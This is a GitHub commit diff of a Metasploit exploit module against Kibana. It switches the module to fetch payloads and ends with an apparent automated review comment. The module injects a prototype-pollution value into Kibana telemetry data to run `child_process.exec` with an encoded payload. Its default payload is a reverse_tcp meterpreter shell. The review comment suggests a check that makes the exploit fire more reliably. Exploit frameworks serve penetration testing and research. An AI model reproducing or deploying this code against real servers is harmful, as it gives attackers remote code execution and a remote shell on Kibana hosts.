convert cmd_stager to fetch payloads
h00die committed Oct 6, 2023
1 parent 5e0538a commit a2a9bec
Showing 1 changed file with 14 additions and 12 deletions.
Expand Up @@ -6,7 +6,6 @@
class MetasploitModule < Msf::Exploit::Remote
Rank = ManualRanking # causes service to not respond until cleanup and reboot
include Msf::Exploit::Remote::HttpClient
include Msf::Exploit::CmdStager
# decided not to use autocheck since it doesn't work for both targets

def initialize(info = {})
Expand Down Expand Up @@ -35,16 +34,18 @@ def initialize(info = {})
'References' => [
[ 'URL', 'https://hackerone.com/reports/852613'],
],
'Platform' => ['linux'],
'Privileged' => false,
'Arch' => ARCH_X64,
'Arch' => [ ARCH_CMD ],
'Platform' => [ 'linux' ],
'Type' => :nix_cmd,
'DefaultOptions' => {
'PAYLOAD' => 'linux/x64/meterpreter/reverse_tcp',
# 'PAYLOAD' => 'linux/x64/meterpreter/reverse_tcp',
'PAYLOAD' => 'cmd/linux/http/x64/meterpreter/reverse_tcp',
'WfsDelay' => 1800 # 30min
},
'Targets' => [
[ 'ELASTIC', { 'CmdStagerFlavor' => [ 'curl' ] } ], # target kibana through a direct elastic connection
[ 'KIBANA', { 'CmdStagerFlavor' => [ 'curl' ] } ] # target kibana through the dev console to implant elastic data
[ 'ELASTIC', {}], # target kibana through a direct elastic connection
[ 'KIBANA', {}] # target kibana through the dev console to implant elastic data
],
'DisclosureDate' => '2020-04-17',
'DefaultTarget' => 0,
Expand All @@ -69,7 +70,7 @@ def initialize(info = {})
# https://stackoverflow.com/a/4899857
def time_rand(from = Time.local(2020, 6, 28), to = Time.now)
Time.at(from + rand * (to.to_f - from.to_f)).strftime('%FT%T.000Z')
# outputs 2010-06-28 06:44:27 0200 format, we need 2020-04-17T20:47:40.800Z
# outputs 2020-04-17T20:47:40.800Z format
end

# This is how it should be done, but it will crash the session. Leaving here in case someone figures out how to not crash the session
Expand Down Expand Up @@ -103,14 +104,14 @@ def elastic_cleanup
fail_with(Failure::UnexpectedReply, "#{peer} - Invalid response (response code: #{res.code})") unless res.code == 200
end

def execute_command(cmd, _opts = {})
def execute_command
case target.name
when 'ELASTIC'
request = {
'uri' => normalize_uri(target_uri.path, '.kibana_1', '_doc', 'upgrade-assistant-telemetry:upgrade-assistant-telemetry'),
'method' => 'PUT',
'ctype' => 'application/json',
'data' => telemetry_data.to_json.sub('PAYLOADHERE', cmd)
'data' => telemetry_data.to_json
}
request['authorization'] = basic_auth(datastore['USERNAME'], datastore['PASSWORD']) if datastore['USERNAME'].present?

Expand All @@ -127,7 +128,7 @@ def execute_command(cmd, _opts = {})
'path' => '.kibana_1/_doc/upgrade-assistant-telemetry:upgrade-assistant-telemetry', # URI for the elastic request
'method' => 'PUT' # method for the elastic query
},
'data' => telemetry_data.to_json.sub('PAYLOADHERE', cmd)
'data' => telemetry_data.to_json
)
end
fail_with(Failure::Unreachable, "#{peer} - Could not connect to web service - no response") if res.nil?
Expand All @@ -140,7 +141,7 @@ def telemetry_data
'ui_open.overview' => 1,
'ui_open.cluster' => 1,
'ui_open.indices' => 1,
'constructor.prototype.sourceURL' => "\u2028\u2029\nglobal.process.mainModule.require('child_process').exec('PAYLOADHERE')"
'constructor.prototype.sourceURL' => "\u2028\u2029\nglobal.process.mainModule.require('child_process').exec('#{payload.encoded}')"
},
'type' => 'upgrade-assistant-telemetry',
'updated_at' => time_rand
Expand Down Expand Up @@ -344,14 +345,15 @@ def exploit
when 'KIBANA'
print_warning('RPORT should most likely be set to 5601 when exploiting the KIBANA target') if datastore['RPORT'] != 5601
# xsrf for unlicensed kibana seems to just be kibana... at least for 7.6.2
# https://discuss.elastic.co/t/where-can-i-get-the-correct-kbn-xsrf-value-for-my-plugin-http-requests/158725/3
@xsrf = 'kibana'
print_status('Creating index')
kibana_create_index
print_status('Sending index map')
kibana_send_mapping
end
print_status('Sending telemetry data with payload')
execute_cmdstager
execute_command
print_status("Waiting #{datastore['WfsDelay']} seconds for shell (kibana restart/cleanup)")
end
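Review bot: In the telemetry_data hunk (the `'constructor.prototype.sourceURL'` line) `payload.encoded` is now interpolated directly into the single-quoted JavaScript literal `exec('…')`, so any `'` or `\` in the generated fetch command would end the literal and break the injected JS; `to_json` escapes the outer JSON layer but is transparent to the JS string once Kibana evaluates it, which is an improvement over the old post-encoding `.sub('PAYLOADHERE', cmd)` but does not cover these characters. Since the module no longer goes through CmdStager, a guard in execute_command before either request is built, `fail_with(Failure::BadConfig, "#{peer} - payload contains a single quote or backslash, which the JS injection cannot carry") if payload.encoded.match?(/['\\]/)`, would turn a silent non-firing exploit into a clear error; the start of telemetry_data and of execute_command lie outside their hunks. The commented-out `# 'PAYLOAD' => 'linux/x64/meterpreter/reverse_tcp'` in DefaultOptions is dead configuration now that the module declares `ARCH_CMD` only; either drop it or say in the comment that it is kept as a reference for the previous CmdStager variant.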

